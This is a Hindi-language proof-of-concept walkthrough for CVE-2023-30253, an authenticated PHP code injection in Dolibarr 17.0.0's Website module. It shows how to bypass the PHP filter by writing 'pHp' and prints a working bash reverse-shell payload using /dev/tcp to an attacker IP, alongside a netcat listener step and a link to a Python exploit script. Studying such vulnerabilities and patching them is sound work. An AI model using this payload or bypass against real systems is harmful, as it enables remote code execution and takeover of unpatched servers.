
Dolibarr 17.0.0 में CMS Website प्लगइन (कोर) सक्षम होने पर, एक प्रमाणित हमलावर एप्लिकेशन प्रतिबंधों को दरकिनार करते हुए php कोड इंजेक्शन के माध्यम से रिमोट कमांड निष्पादन प्राप्त कर सकता है।
CVE-2023-30253 Dolibarr सॉफ्टवेयर में एक सुरक्षा दोष है जो प्रमाणित उपयोगकर्ताओं को इंजेक्ट किए गए डेटा में अपरकेस हेरफेर तकनीक का उपयोग करके रिमोट कोड निष्पादित करने में सक्षम बनाता है।
यह कमजोरी दुर्भावनापूर्ण अभिनेताओं द्वारा अनधिकृत रिमोट कोड निष्पादन का कारण बन सकती है, जो प्रभावित सिस्टम की सुरक्षा और अखंडता के लिए गंभीर खतरा पैदा करती है। यह कमजोरी Dolibarr 17.0.1 में ठीक कर दी गई है।
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
निम्नलिखित PoC दिखाता है कि मैन्युअल रूप से रिवर्स शेल कैसे प्राप्त करें।

test उपयोगकर्ता के रूप में लॉग इन करने के बाद, हम वेबसाइट बना/संशोधित कर सकते हैं।
.png)
पहले एक वेबसाइट बनाएं, और फिर एक पेज बनाएं।
.png)

वेबसाइट और पेज बनाने के बाद, दूरबीन आइकन पर क्लिक करें, यह हमारे बनाए गए पेज को एक नए टैब में खोलेगा।
अब Edit HTML Source पर क्लिक करें।
.png)
यहां हम php कोड जोड़ने का प्रयास कर सकते हैं, लेकिन किसी प्रकार का फ़िल्टर हमें php कोड लिखने से रोक रहा है। इसे php शब्द के प्रारूप को बदलकर आसानी से बायपास किया जा सकता है।
.png)
php शब्द के प्रारूप को pHp में बदलने के बाद, हम देख सकते हैं कि यह सफलतापूर्वक सहेजा गया है।
.png)
पेज पर जाने पर, हम देख सकते हैं कि हमारा डाला गया php कोड काम कर रहा है।
अब रिवर्स शेल प्राप्त करने के लिए, netcat सुनने वाला सेट करें।
.png)
.png)
फिर हमारा रिवर्स शेल कोड जोड़ें <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>
अब वेबसाइट खोलने पर, हमें रिवर्स शेल मिलता है।
.png)
हम इसे आसान बनाने के लिए python कोड का उपयोग कर सकते हैं।

netcat सुनने वाला सेट करें।

स्क्रिप्ट चलाएं और हमें एक रिवर्सशेल मिलना चाहिए।
स्क्रिप्ट के लेखक: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253